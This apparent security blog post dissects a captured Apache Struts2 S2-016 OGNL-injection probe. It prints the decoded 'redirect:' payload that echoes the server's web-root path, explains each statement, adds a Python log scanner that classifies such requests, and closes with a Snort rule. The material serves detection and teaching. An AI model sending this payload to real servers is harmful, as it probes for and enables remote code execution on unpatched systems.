Thursday, March 26, 2015

Apache Struts2 Remote Code Execution Walkthrough

I recently posted notes on an Apache Struts2 Remote Code Execution attempt.

Here's the guts of the attack, shown after percent-decoding:

GET /How.do?redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("dir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().flush(),#res.getWriter().close()}

But what is it doing? Let's walk through it in a bit more detail.

Apache Struts is a free, open-source, MVC framework for creating elegant, modern Java web applications.

Back in 2013 the Struts team published S2-016 (CVE-2013-2251): Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix. The fix shipped in Struts 2.3.15.1.

In this example we see the vulnerable 'redirect:' parameter prefix being used.

GET /How.do?redirect:

A request to a Struts action (the .do suffix is Struts' default action mapping), typically served by a servlet container such as Apache Tomcat, which the attacker hopes is running a version old enough to honour the redirect: prefix. Everything between ${ and } is an OGNL expression; a vulnerable Struts evaluates it while building the redirect location, which is what turns a harmless redirect into code execution.

${
#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),


Look up the HttpServletResponse for this request in the OGNL value-stack context (#context) and store it in the variable #res, so the attacker can write directly into the response body instead of letting Struts send a redirect.

#res.setCharacterEncoding("UTF-8"),

Set the response character encoding to UTF-8 so the output comes back in a predictable, readable form.

#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),

Look up the HttpServletRequest the same way and store it in #req. It is not modified; it is only needed as a path to the session and, from there, to the ServletContext.

#res.getWriter().print("dir:"),
#res.getWriter().println(
#req.getSession().getServletContext().getRealPath("/")
),
#res.getWriter().flush(),
#res.getWriter().close()}


Write the marker "dir:" followed by the absolute path on disk where the container is serving the web application (ServletContext.getRealPath("/")) into the response body, then flush and close the writer so nothing else, including the redirect, is sent. The marker lets the scanner recognise its own output in the reply.

Summary: This request does no damage by itself; it only validates that the attacker has found a vulnerable server that evaluates the injected OGNL. Odds are that this is an automated bot scanning the internet for victims, and if the bot gets a response back (the absolute path on disk where the web application lives) it will immediately send a second, more malicious request that executes commands and drops a persistent payload to compromise the server.
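To make the walkthrough above and the recon-versus-exploit distinction in the summary concrete, here is an added example (not the attacker's tooling, not Struts code and not the Snort rule below) that scans constructed Apache-style access log lines for parameters carrying any of the three S2-016 prefixes, percent-decodes the parameter name, splits the injected OGNL into the same top-level statements listed above, and gives a crude verdict. The client addresses, paths and log lines are constructed for the example; the first line carries the post's own payload as it would look on the wire.

```python
"""Detect S2-016-style Struts prefix injection in access logs and break the
injected OGNL into its top-level statements. Added example for this post;
the log lines and hosts are constructed."""
import re
from urllib.parse import quote, unquote

# Parameter-name prefixes that Struts < 2.3.15.1 treated as navigation
# directives and evaluated as OGNL (S2-016 / CVE-2013-2251).
STRUTS_PREFIXES = ("action:", "redirect:", "redirectAction:")

# The OGNL payload from the post, as it reads after percent-decoding.
RECON_PAYLOAD = (
    "${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),"
    '#res.setCharacterEncoding("UTF-8"),'
    "#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),"
    '#res.getWriter().print("dir:"),'
    '#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),'
    "#res.getWriter().flush(),"
    "#res.getWriter().close()}"
)

# Constructed log lines. On the wire '#', '=' and the braces are
# percent-encoded; otherwise the container would end the parameter name
# at the first '=' and the expression would never reach Struts intact.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Mar/2015:10:01:02 +0000] "GET /How.do?redirect:'
    + quote(RECON_PAYLOAD, safe="") + ' HTTP/1.1" 200 52',
    '203.0.113.7 - - [26/Mar/2015:10:01:03 +0000] "GET /login.do?user=bob&'
    'redirectAction%3A%24%7B%23a%3D1%7D HTTP/1.1" 302 0',
    '198.51.100.4 - - [26/Mar/2015:10:02:11 +0000] '
    '"GET /How.do?page=2&sort=name HTTP/1.1" 200 1834',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
EXEC_MARKERS = ("ProcessBuilder", "getRuntime", ".exec(")
RECON_MARKERS = ("getRealPath", "getWriter", "getServerInfo")


def find_struts_prefixed_params(target):
    """Return (prefix, expression) for each query parameter whose decoded
    name starts with a Struts prefix. The query is split by hand because
    urlsplit would treat the '#' of every OGNL variable as a fragment."""
    if "?" not in target:
        return []
    hits = []
    for raw_param in target.split("?", 1)[1].split("&"):
        name = unquote(raw_param.split("=", 1)[0])
        for prefix in STRUTS_PREFIXES:
            if name.startswith(prefix):
                hits.append((prefix, name[len(prefix):]))
                break
    return hits


def split_ognl_statements(expr):
    """Split the body of a ${...} expression on top-level commas, leaving
    commas inside (), [], {} and quoted strings alone."""
    body = expr.strip()
    if body.startswith("${") and body.endswith("}"):
        body = body[2:-1]
    statements, current = [], []
    depth, quote_char, escaped = 0, None, False
    for ch in body:
        current.append(ch)
        if quote_char:
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == quote_char:
                quote_char = None
        elif ch in "'\"":
            quote_char = ch
        elif ch in "([{":
            depth += 1
        elif ch in ")]}":
            depth -= 1
        elif ch == "," and depth == 0:
            current.pop()  # drop the separator itself
            statements.append("".join(current).strip())
            current = []
    tail = "".join(current).strip()
    if tail:
        statements.append(tail)
    return statements


def classify(statements):
    """'exec' if a process is spawned, 'recon' if the expression only
    reads and echoes server details, otherwise 'unknown'."""
    joined = " ".join(statements)
    if any(m in joined for m in EXEC_MARKERS):
        return "exec"
    if any(m in joined for m in RECON_MARKERS):
        return "recon"
    return "unknown"


def scan_log(lines):
    """Report every logged request carrying a Struts-prefixed parameter."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for prefix, expr in find_struts_prefixed_params(m.group("target")):
            statements = split_ognl_statements(expr)
            findings.append({
                "client": line.split(" ", 1)[0],
                "path": m.group("target").split("?", 1)[0],
                "prefix": prefix,
                "statements": statements,
                "verdict": classify(statements),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["client"], f["path"], f["prefix"], f["verdict"])
        for s in f["statements"]:
            print("   ", s)
```

Unlike a single URI signature, this checks all three prefixes on every parameter, wherever it sits in the query string. It expects raw (still percent-encoded) request lines; if you feed it the decoded request as printed in this post, the unencoded '=' inside the expression will truncate the parameter name, exactly as the container would.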

Keep your software versions up-to-date.

FYI - This is the Snort rule (SID 29748) that captures this attempt. Note that it only matches the literal ".do?redirect:" in the request URI, so the action: and redirectAction: prefixes named in the advisory, or a redirect: parameter that is not the first one in the query string, need separate coverage.
SERVER-APACHE Apache Struts2 blacklisted method redirect (1:29748)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-APACHE Apache Struts2 blacklisted method redirect"; flow:to_server,established; content:".do?redirect|3A|"; fast_pattern:only; http_uri; metadata:policy balanced-ips drop, policy connectivity-ips drop, policy security-ips drop, service http; reference:cve,2013-2248; reference:cve,2013-2251; reference:url,struts.apache.org/release/2.3.x/docs/s2-016.html; reference:url,struts.apache.org/release/2.3.x/docs/s2-017.html; classtype:web-application-attack; sid:29748; rev:1; )

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
